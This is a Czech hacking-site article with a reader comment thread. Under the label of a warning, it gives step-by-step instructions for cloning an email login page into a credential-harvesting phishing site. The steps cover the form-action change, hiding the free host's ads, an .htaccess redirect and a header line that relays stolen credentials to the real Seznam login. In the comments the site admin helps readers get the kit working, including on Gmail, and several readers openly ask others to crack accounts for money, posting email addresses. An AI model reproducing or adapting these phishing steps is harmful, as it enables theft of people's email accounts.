Kategorie: IT, Hacking

Hacknutí hesla na e-mail - sociotechnika || na co dávat pozor?

Pomůžete mi hacknout heslo na email? Častá otázka s kterou se setkávám častěji a častěji, přiblížením jednoho z mnoha způsobů "hacknutí" e-mailu bych rád ukázal na jednoduchost a tím vás varoval na chyby, které mnozí z vás dělají. Popíšem si útok sociotechnika...

hack email

Aktualizováno 11.12.2011

"Jen dvě věci na světě jsou nekonečné...Vesmír a lidská hloupost...Tím prvním si ovšem nejsem jist..." Albert Einstein

Budem brát v úvahu, že útočník si vezme prohlášení pana Alberta jako radu a hlouposti lidí (hlouposti vaší) využije. Útok na váš email tedy může probíhat takto: kliknete na odkaz, zobrazí se výzva k přihlášení, přihlásíte se a čtete obsah stránek. VAŠE HESLO BYLO PROZRAZENO!

Hesla typu "Q.q!SaW_2" jsou zbytečná!

    Co útočníkovi stačí:

  • stažená přihlašovací stránka (poslouží k vytvoření fake kopie)
  • šikovně zvolená doména (klidně i druhého řádu, ovšem přesvědčivost klesá)
  • základní znalost php a html (bo bezmyšlenkové stažení níže uvedených kodů :o) lol)
  • šikovnost a využití vaší hlouposti

Jak bude postupovat:

  • jde na přihlašovací stránku a stáhne ji podobně jako na obrázku

    source
  • vytvoří si soubor například post.php a do něj vloží script, který zpracuje přijaté informace z kopie a odešle je například na email, script může vypadat třebas takto - zde
  • otevře si zdrojový kod stažené stránky s loginem a upraví hodnotu atributu action="neco" na action="post.php" viz. obrázek

    source
  • nyní má post.php, složku souborů která vznikla stažením přihlašovací stránky a samotnou přihlašovací stránku
  • přihlásí se na svůj hosting (například na wz.cz ) a soubory tam uploaduje
  • nyní když zadá adresu která mu tímto vznikne www.jehohosting.cz/prihlasovacistranka.htm načte se klasické přihlášení, s tím rozdílem že zadaná hesla odesílá na email a poté přesměrovává na originální stránku...
  • takový odkaz pak může poslat pomocí fake maileru nebo icq

Pár tipů

Umístěním .htaccess s tímto řádkem (umístění musí být v adresáři s login.html) docílíte zobrazení stránky i při "špatně zadané" url. Využití může být pro modifikaci url k zvýšení důvěryhodnosti.

ErrorDocument 404 /login.html

Dále třeba zobrazení reklamy na freehostingu může být nepříjemná věc, stránka pak na první pohled není reálná. Porušení pravidel freehostingů, ale skrytí reklamy dosáhnete umístěním reklamy do tagů div a pomocí css nastavíte display: none. Příklad:

<div style="display: none;"><!--reklama--></div>

Pokud chcete aby bylo přihlašování na fake webu funkční, můžete využít projektu GET2POST a v souboru send.php namísto přesměrování zaslat správné údaje ke skutečnému zpracování. V ukazkových souborech stačí nahradit řádek začínající header tímto:

header("location: http://www.soom.cz/projects/get2post/resend.php?username=".$user."&password=".$pass."&
login=p%C5%99ihl%C3%A1sit+se&serviceid=email&disablessl=0&forcessl=0&lang=cz&logintype=seznam&
returnurl=http%3A%2F%2Femail.seznam.cz%2Fticket&forcerelogin=0&coid=
&uri=https%3A%2F%2Flogin.szn.cz%2FloginProcess&domain=".$dom);

Jak se bránit? Stačí dodržovat tyto zásady:

  • neklikejte na odkazy příchozí z neznámých adres a čísel
  • neklikejte na odkazy které mají podivnou url
  • zbystřete jestliže po vás odkaz vyžaduje heslo
  • čtěte url a uvažujte
  • pozor! nepřihlašujte se na veřejných terminálech (přesměrování například pomoci FuckDNS)

Odkazy

Testovací balík s připravenými soubory pro hesla seznamu (obsahuje v post.php řádek, starající se o informování napadeného uživatele!): zde

Vše slouží k prostudování hrozby přicházející z této strany, vaše počínání jde mimo mou osobu a veškerou odpovědnost tím berete na sebe! Zneužití je trestné!


Komentáře rss


Strana:  1 2 3 4 5   další »
, Hacknutí emailu odpovědět

Ale když na tom tak uvažuju tak se to týká nejen e-mailů 4 Myslím že je skvělé že tento web existuje 1 Doufám že si všichni čtenáři vezmou příklad a uvědomují si všechny následky 9 .Já jsem se ponaučil a proto děkuji Adminovy 2

, Hacknutí emailu odpovědět

JJ prolomil jsem to.A to že celkově.Jak graficky tak i zbytek.Než sem pročetl soom tak sem to celkem nepobral 3 .Pokud odkaz pošlu přímo na e-mail tak mi příjde e-mail o hrozbě.Ale pokud je odkaz z jiného serveru tak mi nepříjde nic!!Netušíš jak to?? Zkoušim z 2 ip.adres.

, Re : Test emailu odpovědět

Tak jediný k čemu sem se dostal je ("@ ---") 4 .Vše jsem zkoušel na 2 svých e-mailech.Doufám že Admin neudělal nějakej podfuk a moje hesla nelítaj někde po netu ? 8 každopádně jsou projistotku změněný 10

icon odpověděl(a)

Ahoj, pokud se ti zapisuje do logu jen @ --- tak si php script nevzal proměnné. Napiš si jednoduchý php scriptík pro zápis do souboru a proměnné odchytávej $_GET['NEZEV'] nebo postem, podle toho jak je z fake odesíláš - stačí k tomu opravdu minimální znalosti php :)

, Test emailu odpovědět

Tak vyzkoušel jsem co zde Admin tohoto webu radí. 5 Nejspíše to funguje ale heslo ani přihlašovací jméno sem nenašel 7 .Upozornění pro všechny!Kontrolujte opravdu adresu stránky kde se přihlašujete!!! 2

, x odpovědět

Halo pomoc!!!! Vubec to nechapu a nejak mi to nejde prosim, poradte jak to udelat?

, zoznam.sk,e-mail odpovědět

Prosím,potrebuji pomoc! S heslem k e-mailu na zoznam.sk,moc to nechapu.
7 7 ,chtela sem to zkusit...

dííky :)) !

, heslo odpovědět

Dobrý den, potřebuji zjistit heslo k účtu na FB případně na mail. Finanční odměna jistá. Pokud se najde někdo schopný kontaktujte mě na: milan.kavar@seznam.cz

, seznam email odpovědět

Prosíím moc o púomoc, o hacknuti e-mailu: putyus@zoznam.sk
Kdo hackne Moc díky !! 1 1 !! BUdu vdecna,prosim na e-mail kktm@seznam.cz

, zistenie hesla odpovědět

A KED to niekdo viete tak mi to heknite prosim volam sa Dominik Dimitrov a piste na kolombo112@azet.sk

, hacknut odpovědět

prosim hacknes mi moj profil na fb lebo som zabudol heslo a niekdo mi tam chodi email na ktori to posli je kolombo112@azet.sk pekne dakujem

, pomoct heslo u mailu odpovědět

cau prosim o pomoc zjisteni hesla u meho emailu matejka1k@seznam.cz a mysterak@seznam.cz.. hesla zaslete na email ovocitma@seznam.cz 1 predem dekuji :) je to dulezite :)

icon odpověděl(a)

Ještě něco potřebuješ? :-) Nejsme tu helpdesk - článek je ukázka nebezpečí...

, zjisteni hesla odpovědět

cest lidi prosim potrebuju zjistit jedno heslo na jeden email ten kdo se umi dostat na cizi meil prosim piste na muj email kubez@seznam.cz a domluvime se co a jak kdo to udela bude borec a neco mu za to dam je to fakt dulezite dik moc

, pomoct heslo u mailu odpovědět

cau prosim o pomoc zjisteni hesla u meho stareho mailu kdo by dokazal pomoct at napise na lukass.maly@seznam.cz

icon , Hack hesla za odměnu odpovědět

Zdravím, nevím jestli vám na tyto dotazy někdo reaguje (já ne), ale zjištěním cizích hesel a přihlášením se do schránky se porušuje listovní tajemství atd. atd... Tak to berte navědomí :) Díky

, Heslo odpovědět

Může mi někdo pomoct se zjištěním hesla na mail na Seznamu? Odpovědi prosím na Carlis2b6@seznam.cz. Dík

, heslo odpovědět

prosím,fakt moc prosím.umí někdo zjistit heslo na email atlas?
můj email,tonda1@atlas.cz
jen diskétně!odměna!

, nwm odpovědět

prosim zisti my nekdo heslo na email filipcacko@gmail.com

, chyba odpovědět

Mám problém, při zadání emailu a hesla mi to vypíše chybovou hlášku, že nejde otevřít Log.txt ani do něj zapsat apod.. Co stím?

icon odpověděl(a)

Nastavit adresáři a souborům práva 777

, heslo odpovědět

Tak už to fičí i na gmailu. Problém bol ako si písal v tom názve premennej.

odpověděl(a)

Ahoj prosimte nemohl bys mi zjistit jedno heslo ns seznam .díky

, heslo odpovědět

Haluz, na Seznamu to funguje krasne ale na gmailu to piše furt : @ ---
skúšal som aj $_GET['password'] alebo $_POST['password'] v logu

icon odpověděl(a)

A odchytáváš správný název proměnné? :) Koukal jsem na to a gmail posílá údaje jako: Passwd a Email


Strana:  1 2 3 4 5   další »